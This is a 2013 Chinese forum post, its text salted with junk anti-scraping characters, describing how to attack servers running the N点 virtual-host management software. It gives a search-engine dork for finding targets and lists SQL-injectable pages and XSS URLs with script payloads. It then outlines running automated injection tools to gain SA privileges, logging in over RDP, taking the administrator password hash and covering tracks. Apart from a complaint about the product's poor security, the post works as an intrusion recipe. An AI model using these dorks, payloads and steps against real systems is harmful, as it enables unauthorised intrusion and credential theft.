不得不说N点实在是一个破东西8 t* p9 r4 K* F! {
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
0 C: O( E& g! B% A% m6 O, Q好吧 抱怨一下就行了 接下来关键的时候到了
, K& Y: _" }0 e4 l首先百度搜索关键字:inurl: (mmdatabase.asp)2 [' |1 ]5 H$ h) e) f* v
我随便列举一个: www.xxxx.com" H m" D& _& [9 H# N
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
8 z2 T4 Y K4 Q- j7 c- k$ Q1 U Z5 L扔入NBSI 或者啊D等各种傻逼工具后
2 p3 N, P/ m) k' ~' j. l你们会看到是SA权限- x4 H! `' ?' J! f* Y6 G1 n
果断3389 上去 hash得到administrator密码# N, ~- D9 y9 G# |1 |
擦屁股走人~2 X" L, s1 J# y# b
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的* w0 g* J* i- \; {
, F9 U8 v# `- v再附上其他几个漏洞页面
_8 K2 G$ Q, R! D6 I5 \SQL:
1 o3 n8 G: m$ Whttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=14 w, m7 _4 O, W2 k
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
5 l* \" `- @- {2 S9 F ^http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
3 {0 N" v9 ]9 N' u0 M7 n/ xhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
7 R2 W4 `- U+ x5 n) W# y. s$ @XSS证明:6 e3 O) L7 U% k+ v4 r, O
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”) { q2 {" w6 } u; M n$ u
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
* }1 W( V- k0 {( J: Uhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>! O6 u3 E9 A# H8 Z& i" V
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
+ ]( x( ^/ \$ n还是星外吧 你们懂的
6 V" i4 T" ]/ |$ L4 q0 U作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?% I" h7 C" n$ w0 N- b4 P
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
$ V4 v. r) e. X0 J——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对